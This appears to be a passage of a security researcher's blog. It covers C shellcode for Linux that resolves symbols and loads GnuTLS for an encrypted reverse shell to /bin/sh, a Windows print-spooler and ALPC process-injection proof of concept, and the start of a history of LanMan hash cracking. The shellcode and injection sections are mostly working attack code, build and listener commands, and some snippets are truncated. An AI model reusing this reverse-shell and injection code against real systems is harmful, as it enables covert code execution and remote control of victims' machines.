const uint32_t* buckets     = (void*)&bloom[bloom_size];
const uint32_t* chain       = &buckets[nbuckets];

uint64_t word = bloom[(namehash / ELFCLASS_BITS) % bloom_size];
| (uint64_t)1 << (namehash % ELFCLASS_BITS)
| (uint64_t)1 << ((namehash >> bloom_shift) % ELFCLASS_BITS);

return NULL;
}

uint32_t symix = buckets[namehash % nbuckets];
if (symix < symoffset) {
return NULL;
}

/* Loop through the chain. */
for (;;) {
const char* symname = strtab + symtab[symix].st_name;
const uint32_t hash = chain[symix - symoffset];
if (namehash|1 == hash|1 && _strcmp(name, symname) == 0) {
return (void*)symtab[symix].st_value;
}
if(hash & 1) break;
symix++;
}
return 0;
}
```

### 7.3 Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)

The following function works similar to `GetProcAddress` on Windows and `dlsym` on Linux. Given a base address and name of function, lookup the virtual address of function using the hash table.

```void *get_proc_address(void *module, void *name) {
Elf64_Dyn  *symtab, *strtab, *hash;
Elf64_Sym  *syms;
char       *strs;

// 1. obtain pointers to string and symbol tables
strtab = elf_get_dyn(module, DT_STRTAB);
symtab = elf_get_dyn(module, DT_SYMTAB);

if(strtab == NULL || symtab == NULL) return NULL;

strs = (char*)strtab->d_un.d_ptr;
syms = (Elf64_Sym*)symtab->d_un.d_ptr;

// 3. try obtain the ELF hash table
hash = elf_get_dyn(module, DT_HASH);

// 4. if we have it, lookup symbol by ELF hash
if(hash != NULL) {
addr = elf_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
} else {
// if we don't, try obtain the GNU hash table
hash = elf_get_dyn(module, DT_GNU_HASH);
if(hash != NULL) {
addr = gnu_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
}
}
}
}
```

This approach requires using the hash table, but in the next example, I’ll show a method similar to what’s used in Windows shellcode.

### 7.4 Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)

Another way to lookup the address of a function that is by using the section headers. `get_proc_address2` given the base of a module will obtain the path of library and pass it to `get_proc_address3` that will then search the symbol table using a hash of the function name. `get_proc_address3` is primarily for statically linked binaries.

```// lookup by hash using the base address of module
void *get_proc_address2(void *module, uint32_t hash) {
char            *path=NULL;
Elf64_Phdr      *phdr;
Elf64_Dyn       *got;

if(module == NULL) return NULL;

// 1. obtain pointer to dynamic program header
phdr = (Elf64_Phdr*)elf_get_phdr(module, PT_DYNAMIC);

if(phdr != NULL) {
// 2. obtain global offset table
got = elf_get_dyn(module, DT_PLTGOT);
if(got != NULL) {
ptrs = (uint64_t*)got->d_un.d_ptr;
// 3. search through link_map for module
while (map != NULL) {
// this our module?
path = map->l_name;
break;
}
}
}
}
if(path == NULL) return NULL;

}

// lookup by hash using the path of library (static lookup)
void* get_proc_address3(const char *path, uint32_t hash) {
int         i, fd, cnt=0;
Elf64_Ehdr *ehdr;
Elf64_Phdr *phdr;
Elf64_Shdr *shdr;
Elf64_Sym  *syms=0;
char       *strs=0;
uint8_t    *map;
struct stat fs;
int         str[8];

// /proc/self/exe
str[0] = 0x6f72702f;
str[1] = 0x65732f63;
str[2] = 0x652f666c;
str[3] = 0x00006578;

// open file
fd = _open(path == NULL ? (char*)str : path, O_RDONLY, 0);
if(fd == 0) return NULL;
// get the size
if(_fstat(fd, &fs) == 0) {
// map into memory
map = (uint8_t*)_mmap(NULL, fs.st_size,
if(map != NULL) {
ehdr = (Elf64_Ehdr*)map;
shdr = (Elf64_Shdr*)(map + ehdr->e_shoff);
// locate static or dynamic symbol table
for(i=0; i<ehdr->e_shnum; i++) {
if(shdr[i].sh_type == SHT_SYMTAB ||
shdr[i].sh_type == SHT_DYNSYM) {
syms = (Elf64_Sym*)(map + shdr[i].sh_offset);
cnt  = shdr[i].sh_size/sizeof(Elf64_Sym);
}
}
// loop through string table for function
for(i=0; i<cnt; i++) {
if(gnu_hash(&strs[syms[i].st_name]) == hash) {
}
}
_munmap(map, fs.st_size);
}
}
_close(fd);
}
```

The normal way to load a shared object and resolve the address of a function is via `dlopen` and `dlsym` respectively. Both of these functions are exported by `libdl.so` – the dynamic linking library. For my build of Debian, `libc.so` doesn’t use code inside `libdl.so` because the mechanics of loading libraries and resolving functions are actually within `ld.so` – the dynamic linker/loader. This loader also doesn’t export or make publicly available either of the functions required, but pointers to the real functions can be found in a read-only shared area of memory called `_rtld_global_ro` that is exposed via the symbol table. This is a structure defined in `/sysdeps/generic/ldsodefs.h` that when compiled with `SHARED` defined will include pointers to the dynamic loading functions.

### 8.1 __libc_dlopen_mode and __libc_dlsym

Before discussing anything about `_rtld_global_ro`, you can find functions in the symbol table of `libc.so` that allow you to dynamically load shared objects without using `libdl.so`

```user@nostromo:~/hub/shellcode\$ readelf /lib/x86_64-linux-gnu/libc-2.24.so -s |grep -i "__libc_dl"
1165: 000000000011fa60    17 FUNC    GLOBAL DEFAULT   13 __libc_dl_error_tsd@@GLIBC_PRIVATE
1216: 000000000011f4b0    35 FUNC    GLOBAL DEFAULT   13 __libc_dlclose@@GLIBC_PRIVATE
2043: 000000000011f440   100 FUNC    GLOBAL DEFAULT   13 __libc_dlsym@@GLIBC_PRIVATE
2152: 000000000011f3f0    80 FUNC    GLOBAL DEFAULT   13 __libc_dlopen_mode@@GLIBC_PRIVATE
```

To load libraries, we need to resolve the address of `__libc_dlopen_mode` and if we want to resolve the address of functions by string, we also need `__libc_dlsym`. The following code shows how you might load `libgnutls.so` using a static path.

```  void *clib, *gnutls;

clib = get_module_handle("libc");

gnutls = _dl_open("/usr/lib/x86_64-linux-gnu/libgnutls.so", RTLD_LAZY);
```

Now onto the `_rtld_global_ro` object that may be of interest to you. The following shows the function pointers for dynamic loading. Depending on the version of glibc, the structure itself can differ in size. I was curious to see if it was possible to find `_dl_open` using this object in the event `__libc_dlopen_mode` was not available for any reason.

```user@nostromo:~/hub/shellcode\$ readelf -s /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 |grep -i "rtld_global_ro"
25: 0000000000223ca0   376 OBJECT  GLOBAL DEFAULT   16 _rtld_global_ro@@GLIBC_PRIVATE
```
```#ifdef SHARED
// We add a function table to _rtld_global which is then used to
//   call the function instead of going through the PLT.  The result
//   is that we can avoid exporting the functions and we do not jump
//   PLT relocations in libc.so.

void (*_dl_debug_printf) (const char *, ...)
__attribute__ ((__format__ (__printf__, 1, 2)));

int (internal_function *_dl_catch_error) (const char **, const char **,
bool *, void (*) (void *), void *);

void (internal_function *_dl_signal_error) (int, const char *, const char *,
const char *);

lookup_t (internal_function *_dl_lookup_symbol_x) (const char *,
const ElfW(Sym) **,
struct r_scope_elem *[],
const struct r_found_version *,
int, int,

int (*_dl_check_caller) (const void *, enum allowmask);

void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,
Lmid_t nsid, int argc, char *argv[], char *env[]);

void (*_dl_close) (void *map);

#ifdef HAVE_DL_DISCOVER_OSVERSION
int (*_dl_discover_osversion) (void);
#endif
```

You can view the data for a process under GDB if you know the address of `_rtld_global_ro`.

```(gdb) x/40xg 0x7ffff7ffcca0
0x7ffff7ffcca0 <_rtld_global_ro>:     0x0004099000000000  0x00007fffffffe4d9
0x7ffff7ffccb0 <_rtld_global_ro+16>:  0x0000000000000006  0x0000000000001000
0x7ffff7ffccc0 <_rtld_global_ro+32>:  0x0000000000000000  0x00007ffff7fcca30
0x7ffff7ffccd0 <_rtld_global_ro+48>:  0x0000000000000004  0x0000000000000064
0x7ffff7ffcce0 <_rtld_global_ro+64>:  0x0000000100000002  0x0000000000000000
0x7ffff7ffccf0 <_rtld_global_ro+80>:  0x000003030000037f  0x00000000bfebfbff
0x7ffff7ffcd00 <_rtld_global_ro+96>:  0x0000000000000000  0x00007fffffffe390
0x7ffff7ffcd10 <_rtld_global_ro+112>: 0x0000001600000001  0x02100800000406e3
0x7ffff7ffcd20 <_rtld_global_ro+128>: 0xbfebfbff7ffafbbf  0x029c67af00000000
0x7ffff7ffcd30 <_rtld_global_ro+144>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd40 <_rtld_global_ro+160>: 0x0000000000000000  0x0000004e00000006
0x7ffff7ffcd50 <_rtld_global_ro+176>: 0x00000000000003c0  0x000000000034ccf1
0x7ffff7ffcd60 <_rtld_global_ro+192>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd70 <_rtld_global_ro+208>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd80 <_rtld_global_ro+224>: 0x00007ffff7df503c  0x0000000000000000
0x7ffff7ffcd90 <_rtld_global_ro+240>: 0x0000000000000000  0x00007ffff7ffec28
0x7ffff7ffcda0 <_rtld_global_ro+256>: 0x00007ffff7ffa000  0x00007ffff7ffe708
0x7ffff7ffcdb0 <_rtld_global_ro+272>: 0x0000000000000000  0x00007ffff7de9630
0x7ffff7ffcdc0 <_rtld_global_ro+288>: 0x00007ffff7de85d0  0x00007ffff7de8390
0x7ffff7ffcdd0 <_rtld_global_ro+304>: 0x00007ffff7deaa30  0x00007ffff7de2ea0
```

Using some simple code, we can identify with `_dl_addr` the addresses that belong to ld-linux.

```typedef struct {
const char *dli_fname;  // File name of defining object.
const char *dli_sname;  // Name of nearest symbol.
void       *dli_saddr;  // Exact value of nearest symbol.
} Dl_info;

Dl_info *info,
const Elf64_Sym **symbolp);

-------------------------------
void      *clib, *ld;
uint64_t  *rtld;
DL_info   info;

clib = get_module_handle("libc");

// 2. resolve the address of _rtld_global_ro in ld-linux.so
ld = get_module_handle("ld-linux");

// 3. try the first 64 entries
for(i=0;i<64;i++) {
const char *str = info.dli_sname ? : "N/A";
printf("[%i] %p : %-10s : %s \n",
i, rtld[i], str, info.dli_fname);
}
}
```

Below shows basic output using the above code.

```[28] 0x7f5dde45c03c : N/A        : /lib64/ld-linux-x86-64.so.2
[32] 0x7ffd6d904000 : LINUX_2.6  : linux-vdso.so.1
[35] 0x7f5dde450630 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_printf
[36] 0x7f5dde44f5d0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_catch_error
[37] 0x7f5dde44f390 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_signal_error
[38] 0x7f5dde451a30 : _dl_mcount : /lib64/ld-linux-x86-64.so.2  // _dl_mcount
[39] 0x7f5dde449ea0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_lookup_symbol_x
[40] 0x7f5dde452fc0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_check_caller
[41] 0x7f5dde453540 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_open
[42] 0x7f5dde455560 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_close
[43] 0x7f5dde452b40 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_tls_get_addr_soft
[44] 0x7f5dde457b80 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_discover_osversion
```

In this instance, we know the address of `_dl_open` will be at `_rtld_global_ro + 41*8`. It’s certainly possible to call the function, but internally is a check for where the call originated from. `dl_check_caller` will determine if the call originated from a valid Dynamic Shared Object (DSO).

```// Bit masks for the objects which valid callers can come from to
//   functions with restricted interface.
allow_libc = 1,
allow_libdl = 2,
allow_ldso = 8
};
```

The following is a snippet of the code to validate a caller from `elf/dl-caller.c`.

```static void dl_open_worker (void *a) {
struct dl_open_args *args = a;
const char *file = args->file;
int mode = args->mode;

// Check whether _dl_open() has been called from a valid DSO.
if (__check_caller (args->caller_dl_open,
allow_libc|allow_libdl|allow_ldso) != 0)
_dl_signal_error (0, "dlopen", NULL, N_("invalid caller"));
```

As you can see, only `libc.so`, `libdl.so` and `ld.so` are permitted to load a library. Bypassing this check is trivial, but thankfully not required because `libc.so` exports `__libc_dlopen_mode`

### 8.2 Parsing /etc/ld.so.conf

A list of shared libraries are stored in `/etc/ld.so.cache` and a list of trusted paths can be found in `/etc/ld.so.conf`. If you wanted to map a library into memory without knowing the full path, one way would be checking each of the entries in cache or by appending the name of a library to each of the paths found in the configuration file. For this shellcode, all libraries required are stored in the cache list and `dlopen` doesn’t require a full path.

### 9. Reverse Shell using SSL/TLS

The reverse shell uses synchronization so that it’s possible to create a sub process running `/bin/sh` with stdin,stdout and stderr being redirected through anonymous pipes. We then monitor I/O signals on those anonymous pipes and a TCP socket. This allows us to encrypt/decrypt using the GNU TLS functions. It is based on epl.c that does not use any encryption for interacting with `/bin/sh`.

### 9.1 Data Table

Since we can’t use any global variables for a PIC, everything is stored on the stack. To manage this data more efficiently, I’ve defined a structure that contains all the pointers to functions and variables for various operations should it be required by other subroutines.

```typedef struct _data_t {
int s;       // socket file descriptor

union {
uint64_t hash[64];
struct {
// gnu c library functions
pipe_t          _pipe;
fork_t          _fork;
socket_t        _socket;
// .... snipped
};
} api;
} data_t;
```

### 9.2 Strings

Declaring strings is a slight problem for a shellcode because gcc will move them all to a read-only segment (`.rodata`) that is separate from the (`.text`) segment. There are a few ways to work around this. elfmaster suggests using the -N option of the linker `ld` to combine all segments into one. fishstiqz uses a combination of macros and inline assembly. What I do is declare an array of integers large enough to hold the string. That array is then initialized using the string converted to integers. gcc should do this automatically, but it’s currently not an option. The following code demonstrates the idea where len is initialized to the length of string and str is an empty array of integers. i.e `int str[16];`

```    int *str;

len = strlen(input);
str = (int*)input;

// align up by 4
len = (len & -4) + 4;
len >>= 2;

for(i=0;i<len;i++) {
printf("str[%i] = 0x%08lx;\n", i, str[i]);
}
```

As an example, the string “/proc/self/maps” becomes:

```    str[0] = 0x6f72702f;
str[1] = 0x65732f63;
str[2] = 0x6d2f666c;
str[3] = 0x00737061;
str[4] = 0;
```

One might also consider storing all strings in a separate block of data that is then simply passed to each subroutine as a parameter.

### 9.3 Compiling

A `Makefile` is provided to compile and extract the shellcode automatically. It uses gcc to compile and objcopy to extract. xxd then converts the binary in tls.bin to a C style string and redirects output to tls.h. Don’t forget that tls.c uses port 1234 and 127.0.0.1 as the peer address because it’s only a proof of concept.

```  gcc -O0 -nostdlib -fpic tls.c -o tls
objcopy -O binary --only-section=.text tls tls.bin
xxd -i tls.bin > tls.h
```

The gcc option -O0 implies disabling optimizations. -nostdlib implies not using any standard library functions and -fpic implies generating position-independent code. Objcopy simply extracts the executable code stored in the `.text` segment.

### 9.4 Testing

ncat, that comes bundled with nmap supports raw I/O using TLS/SSL. The following will listen for incoming SSL/TLS connections on port 1234 using any ipv4 interface.

```  ncat -lvk4 1234 --ssl
```

runsc.c can be used to execute the code from memory.

```  runsc -x -f tls.bin
```

### 10. Summary

As you can see, it’s entirely possible to avoid using pure assembly code for a PIC. Admittedly, some assembly is used here to workaround limitations of C itself, but would be completely avoidable if the C code was supplied with a valid address of the host process, `libc.so` or any other shared object. Sources can be found here.

## Windows Process Injection: Print Spooler

### Introduction

Figure 1. Notepad running under spooler process.

### Finding Callback Environments

Callback functions are stored in mostly opaque/undocumented structures that I haven’t taken the time to fully document here because my main objective is to perform code injection. For the print spooler, we’re only interested in the TP_ALPC structure that is used by TppAlpcpExecuteCallback located in NTDLL.dll. This function dispatches printer requests via the LPC port to LrpcIoComplete located in RPCRT4.dll. TP_ALPC contains a TP_CALLBACK_ENVIRON structure or what I’ll refer to as CBE from now on. CBEs can be found in both the stack and heap memory space of a process, so the virtual memory we need to scan has the following memory attributes.

• State is MEM_COMMIT
• Type is MEM_PRIVATE

The data we’re looking for can be interepreted using the following structure.

```typedef struct _TP_CALLBACK_ENVIRON_V3 {
TP_VERSION                         Version;
PTP_POOL                           Pool;
PTP_CLEANUP_GROUP                  CleanupGroup;
PTP_CLEANUP_GROUP_CANCEL_CALLBACK  CleanupGroupCancelCallback;
PVOID                              RaceDll;
struct _ACTIVATION_CONTEXT        *ActivationContext;
PTP_SIMPLE_CALLBACK                FinalizationCallback;
union {
DWORD                          Flags;
struct {
DWORD                      LongFunction :  1;
DWORD                      Persistent   :  1;
DWORD                      Private      : 30;
} s;
} u;
TP_CALLBACK_PRIORITY               CallbackPriority;
DWORD                              Size;
} TP_CALLBACK_ENVIRON_V3;
```

However, in memory, two additional pointers are required. One is the actual callback function and the other is a callback parameter. It is likely a separate structure that also appears to be undocumented.

```00000000`011fbd08  00000000`00000001 ; Version
00000000`011fbd10  00007ffc`b50c0680 ntdll!TppAlpcpCleanupGroupMemberVFuncs ; Pool
00000000`011fbd18  00000000`00000000 ; CleanupGroup
00000000`011fbd20  00000000`00000000 ; CleanupGroupCancelCallback
00000000`011fbd28  00000000`00000000 ; RaceDll
00000000`011fbd30  00000000`011fbd30 ; ActivationContext
00000000`011fbd38  00000000`011fbd30 ; FinalizationCallback
00000000`011fbd40  00000000`00000000 ; Flags
00000000`011fbd48  00000000`00000000 ; CallbackPriority
00000000`011fbd50  00000000`00000000 ; Size

00000000`011fbd58  00007ffc`b38a9240 RPCRT4!LrpcIoComplete ; Callback
00000000`011fbd60  00000000`0121c948 ; CallbackParameter
```

The following structure is used to find valid CBEs instead of the original from the SDK.

```// this structure is derived from TP_CALLBACK_ENVIRON_V3,
// but also includes two additional values. one to hold
// the callback function and the other is a callback parameter
typedef struct _TP_CALLBACK_ENVIRON_X {
ULONG_PTR   Version;
ULONG_PTR   Pool;
ULONG_PTR   CleanupGroup;
ULONG_PTR   CleanupGroupCancelCallback;
ULONG_PTR   RaceDll;
ULONG_PTR   ActivationContext;
ULONG_PTR   FinalizationCallback;
ULONG_PTR   Flags;
ULONG_PTR   CallbackPriority;
ULONG_PTR   Size;
ULONG_PTR   Callback;
ULONG_PTR   CallbackParameter;
} TP_CALLBACK_ENVIRON_X;
```

We read blocks of memory equivalent to the size of TP_CALLBACK_ENVIRON_X and validate them with some simple checks. The following function can determine if the memory looks like a valid CBE.

```BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe) {
MEMORY_BASIC_INFORMATION mbi;
SIZE_T                   res;

// invalid version?
if(cbe->Version > 5) return FALSE;

// these values shouldn't be empty
if(cbe->Pool                 == 0 ||
cbe->FinalizationCallback == 0) return FALSE;

// these values should be equal
if ((LPVOID)cbe->FinalizationCallback !=
(LPVOID)cbe->ActivationContext) return FALSE;

// priority shouldn't exceed TP_CALLBACK_PRIORITY_INVALID
if(cbe->CallbackPriority > TP_CALLBACK_PRIORITY_INVALID) return FALSE;

// the pool functions should originate from read-only memory
res = VirtualQueryEx(hProcess, (LPVOID)cbe->Pool, &mbi, sizeof(mbi));

if (res != sizeof(mbi)) return FALSE;
if (!(mbi.Protect & PAGE_READONLY)) return FALSE;

// the callback function should originate from read+execute memory
res = VirtualQueryEx(hProcess,
(LPCVOID)cbe->Callback, &mbi, sizeof(mbi));

if (res != sizeof(mbi)) return FALSE;
}
```

The payload is written in C and simply runs notepad. Calculator isn’t used because it’s a metro application on Windows 10 that has specific requirements to work. The TP_ALPC structure passed to LrpcIoComplete isn’t documented, but does include a structure similar to TP_CALLBACK_ENVIRON_V3. Once our payload is executed, we first restore the original Callback and CallbackParameter values. This is required because once we call WinExec, it will trigger another call to LrpcIoComplete, entering into an infinite loop before crashing the process. After restoration, call WinExec, followed by LrpcIoComplete using original values.

```#ifdef TPOOL // Thread Pool Callback
// the wrong types are used here, but it doesn't really matter
typedef struct _TP_ALPC {
// ALPC callback info
ULONG_PTR   AlpcPool;
ULONG_PTR   Unknown1;
ULONG_PTR   Unknown2;
ULONG_PTR   Unknown3;
ULONG_PTR   Unknown4;
ULONG_PTR   AlpcActivationContext;
ULONG_PTR   AlpcFinalizationCallback;
ULONG_PTR   AlpcCallback;
ULONG_PTR   Unknown5;
// callback environment
ULONG_PTR   Version;
ULONG_PTR   Pool;
ULONG_PTR   CleanupGroup;
ULONG_PTR   CleanupGroupCancelCallback;
ULONG_PTR   RaceDll;
ULONG_PTR   ActivationContext;
ULONG_PTR   FinalizationCallback;
ULONG_PTR   Flags;
ULONG_PTR   CallbackPriority;
ULONG_PTR   Size;
ULONG_PTR   Callback;
ULONG_PTR   CallbackParameter;
} TP_ALPC;

typedef struct _tp_param_t {
ULONG_PTR   Callback;
ULONG_PTR   CallbackParameter;
} tp_param;

typedef TP_ALPC TP_ALPC, *PTP_ALPC;

typedef void (WINAPI *LrpcIoComplete_t)(LPVOID, LPVOID, LPVOID, LPVOID);

VOID TpCallBack(LPVOID tp_callback_instance,
LPVOID param, PTP_ALPC alpc, LPVOID unknown2)
#endif
{
WinExec_t pWinExec;
DWORD     szWinExec[2],
#ifdef TPOOL
LrpcIoComplete_t pLrpcIoComplete;
tp_param         *tp=(tp_param*)param;
ULONG_PTR        op;
// param should contain pointer to tp_param
pLrpcIoComplete = (LrpcIoComplete_t)tp->Callback;
op              = tp->CallbackParameter;
// restore original values
// this will indicate we executed ok,
// but is also required before the call to WinExec
alpc->Callback          = tp->Callback;
alpc->CallbackParameter = tp->CallbackParameter;
#endif
// now call WinExec to start notepad
szWinExec[0] = *(DWORD*)"WinE";
szWinExec[1] = *(DWORD*)"xec\0";

if(pWinExec != NULL) {
}

// finally, pass the original message on..
#ifdef TPOOL
pLrpcIoComplete(tp_callback_instance,
(LPVOID)alpc->CallbackParameter, alpc, unknown2);
#endif

#ifndef TPOOL
return 0;
#endif
}
```

Here, we use a conventional method of sharing the payload/shellcode with spooler process. This consists of:

• OpenProcess(“spoolsv.exe”)

Once we have a valid CBE, we patch the Callback pointer with address to our payload and try invoke it using the print spooler API. Although OpenPrinter is used in the following code, you could probably use any other API that involves interaction with the print spooler service. At the abstraction layer, interaction with the print spooler service is conducted over Local Procedure Call (LPC) which is an interprocess communication. Over the network uses Remote Procedure Call (RPC) but we’re obviously not injecting over network. 😉

```// try inject and run payload in remote process using CBE
BOOL inject(HANDLE hp, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
LPVOID               cs = NULL;
BOOL                 bStatus = FALSE;
TP_CALLBACK_ENVIRONX cpy;    // local copy of cbe
SIZE_T               wr;
HANDLE               phPrinter = NULL;
tp_param             tp;

// allocate memory in remote for payload and callback parameter
cs = VirtualAllocEx(hp, NULL, payloadSize + sizeof(tp_param),

if (cs != NULL) {
// write payload to remote process
// backup CBE
CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
// copy original callback address and parameter
tp.Callback          = cpy.Callback;
tp.CallbackParameter = cpy.CallbackParameter;
// write callback+parameter to remote process
WriteProcessMemory(hp, (LPBYTE)cs + payloadSize, &tp, sizeof(tp), &wr);
cpy.Callback          = (ULONG_PTR)cs;
// update CBE in remote process
WriteProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr);
if(OpenPrinter(NULL, &phPrinter, NULL)) {
ClosePrinter(phPrinter);
}
// restore the original cbe
WriteProcessMemory(hp, ds, cbe, sizeof(cpy), &wr);
// if callback pointer is the original, we succeeded.
bStatus = (cpy.Callback == cbe->Callback);
}
return bStatus;
}
```

Figure 2 shows an attempt to inject code by four different DLL before finally succeeding with RPCRT4.dll.

Figure 2. Code injection via Callback Environment

The code shown here is only a proof of concept and could be refined to be more elegant or be applied to other processes that use thread pooling. I only use the print spooler here, but of course other processes use thread pooling and could also be leveraged for code injection. Sources can be found here.

### Update

To use the same method of injection against almost any other process that uses ALPC, you can connect directly to the ALPC port.

```/**
Get a list of ALPC ports with names
*/
DWORD GetALPCPorts(process_info *pi)
{
ULONG                      len=0, total=0;
NTSTATUS                   status;
LPVOID                     list=NULL;
DWORD                      i;
HANDLE                     hObj;
PSYSTEM_HANDLE_INFORMATION hl;
POBJECT_NAME_INFORMATION   objName;

pi->ports.clear();

// get a list of handles for the local system
for(len=MAX_BUFSIZ;;len+=MAX_BUFSIZ) {
list = xmalloc(len);
status = NtQuerySystemInformation(
SystemHandleInformation, list, len, &total);
// break from loop if ok
if(NT_SUCCESS(status)) break;
// free list and continue
xfree(list);
}

hl      = (PSYSTEM_HANDLE_INFORMATION)list;
objName = (POBJECT_NAME_INFORMATION)xmalloc(8192);

// for each handle
for(i=0; i<hl->NumberOfHandles; i++) {
// skip if process ids don't match
if(hl->Handles[i].UniqueProcessId != pi->pid) continue;

// skip if the type isn't an ALPC port
// note this value might be different on other systems.
// this was tested on 64-bit Windows 10
if(hl->Handles[i].ObjectTypeIndex != 45) continue;

// duplicate the handle object
status = NtDuplicateObject(
pi->hp, (HANDLE)hl->Handles[i].HandleValue,
GetCurrentProcess(), &hObj, 0, 0, 0);

// continue with next entry if we failed
if(!NT_SUCCESS(status)) continue;

// try query the name
status = NtQueryObject(hObj,
ObjectNameInformation, objName, 8192, NULL);

// got it okay?
if(NT_SUCCESS(status) && objName->Name.Buffer!=NULL) {
// save to list
pi->ports.push_back(objName->Name.Buffer);
}
// close handle object
NtClose(hObj);
}
// free list of handles
xfree(objName);
xfree(list);
return pi->ports.size();
}
```

### Connecting to ALPC port

```// connect to ALPC port
BOOL ALPC_Connect(std::wstring path) {
SECURITY_QUALITY_OF_SERVICE ss;
NTSTATUS                    status;
UNICODE_STRING              server;
ULONG                       MsgLen=0;
HANDLE                      h;

ZeroMemory(&ss, sizeof(ss));
ss.Length              = sizeof(ss);
ss.ImpersonationLevel  = SecurityImpersonation;
ss.EffectiveOnly       = FALSE;
ss.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;

RtlInitUnicodeString(&server, path.c_str());

status = NtConnectPort(&h, &server, &ss, NULL,
NULL, (PULONG)&MsgLen, NULL, NULL);

NtClose(h);

return NT_SUCCESS(status);
}
```

### Deploying/Triggering

Same as before except we have to try multiple ALPC ports instead of just using print spooler API.

```// try inject and run payload in remote process using CBE
BOOL ALPC_deploy(process_info *pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
LPVOID               cs = NULL;
BOOL                 bInject = FALSE;
TP_CALLBACK_ENVIRONX cpy;    // local copy of cbe
SIZE_T               wr;
tp_param             tp;
DWORD                i;

// allocate memory in remote for payload and callback parameter
cs = VirtualAllocEx(pi->hp, NULL,

if (cs != NULL) {
// write payload to remote process
// backup CBE
CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
// copy original callback address and parameter
tp.Callback          = cpy.Callback;
tp.CallbackParameter = cpy.CallbackParameter;
// write callback+parameter to remote process
WriteProcessMemory(pi->hp, (LPBYTE)cs + pi->payloadSize, &tp, sizeof(tp), &wr);
cpy.Callback          = (ULONG_PTR)cs;
// update CBE in remote process
WriteProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr);
for(i=0;i<pi->ports.size(); i++) {
ALPC_Connect(pi->ports[i]);
// if callback pointer is the original, we succeeded.
bInject = (cpy.Callback == cbe->Callback);
if(bInject) break;
}
// restore the original cbe
WriteProcessMemory(pi->hp, ds, cbe, sizeof(cpy), &wr);
VirtualFreeEx(pi->hp, cs,
}
return bInject;
}
```

Sources can be found here.

Posted in injection, malware, programming, windows | | 2 Comments

## How the L0pht (probably) optimized attack against the LanMan hash.

### 1. Introduction

Some of you may remember a famous group of hackers that operated out of a loft (or attic) in Boston, Massachusetts, USA between 1992 and 2000 that called themselves L0pht Heavy Industries. Perhaps a defining moment in the group’s history was in May 1998 when they testified before the United States Congress, forewarning about the fragility of the Internet and how it could be shut down in 30 minutes using the Border Gateway Protocol (BGP). Most oldskool hackers will remember them for being some of the first security researchers to practice responsible disclosure of software vulnerabilities via advisories, aswell as maintaining a number of websites like HackerNews.com, the Black Crawling Systems Archives, the Whacked Mac Archives and Guerilla.net.

Like many people, I remember the group for writing L0phtCrack, a tool designed to recover passwords protected by the Windows operating system. L0phtCrack was originally published with an advisory almost 22 years ago in April 1997. In the year 2000, a now defunct company called @atstake acquired L0pht, including the ownership rights to L0phtCrack. In 2004, Symantec acquired @atstake before discontinuing development and distribution of L0phtCrack in 2005. In 2009, members of the original L0pht group (Zatko, Wysopal, and Rioux) reacquired ownership rights to L0phtCrack and continued with its development up to the present day. Those of you that want to know more about the group can read History of the L0pht.

This post suggests some ways the L0pht may have accelerated recovery of passwords protected by the LanMan (LM) hash that is derived from the Data Encryption Standard (DES). I don’t reveal any Top Secret technique for cracking DES that only L0pht or some alphabet agencies know about. Similar optimizations were implemented over twenty years ago by Alexander Peslyak and Roman Rusakov in another popular password recovery tool called John The Ripper.

### 2. Data Encryption Standard

DES is a block cipher that operates on plaintext blocks of 64-bits and returns ciphertext blocks of the same size. Each key can be 56-bits in total giving us $2^{56}$ (72,057,594,037,927,936), or approximately 72 quadrillion possible keys. A 56-bit key is expanded into 16 subkeys or round keys, each of which is 48-bits long. It has for over 20 years been considered obsolete and insecure, but continues to be used mainly to support legacy systems.

What follows is a list of notable events around initial research into cracking DES, including the LanMan hash derived from DES.

 January 1997 Cryptographer Eli Biham publishes his paper at Fast Software Encryption 4 titled A Fast New DES Implementation in Software. It describes a novel way to optimize the Data Encryption Standard using simple bitwise operations (XOR, AND, NOT, OR). Although unrelated to the development of L0phtCrack, the technique would later be used to optimize attacks against the LanMan hash in tools like John The Ripper. January 1997 Rocke Verser launches DESCHALL in response to an offer by RSA to crack DES for a \$10,000 prize. March 1997 Samba developer Jeremy Allison releases pwdump. It enables Administrators to dump LM (derived from DES) and NTLM (derived from MD4) hashes stored in the Security Account Manager (SAM) database on Windows NT. April 1997 L0phtCrack v1.0 released. It primarily exploits the poor design of the LanMan algorithm to recover plaintext passwords. May 1997 Microsoft releases Service Pack 3 for Windows NT that includes “SYSKEY”; an optional component designed to prevent pwdump working properly. June 1997 Rocke Verser announces the recovery a 56-bit DES key. July 1997 L0phtCrack v1.5 released. Includes a much more detailed analysis of Server Message Block (SMB) authentications. Cryptographer David Wagner shares his observations on the the challenge response/pair and suggests ways to optimize attacks against it. August 1997 L0pht attend the Beyond HOPE (The Hackers on Planet Earth) conference in New York city. Discuss the lack of adequate security provided by vendors in various technologies. February 1998 L0phtCrack v2.0 released. Includes an SMB session network sniffer, a multithreaded brute force algorithm and faster search algorithm for large databases. May 1998 Matthew Kwan releases his “bitslice” code based on the 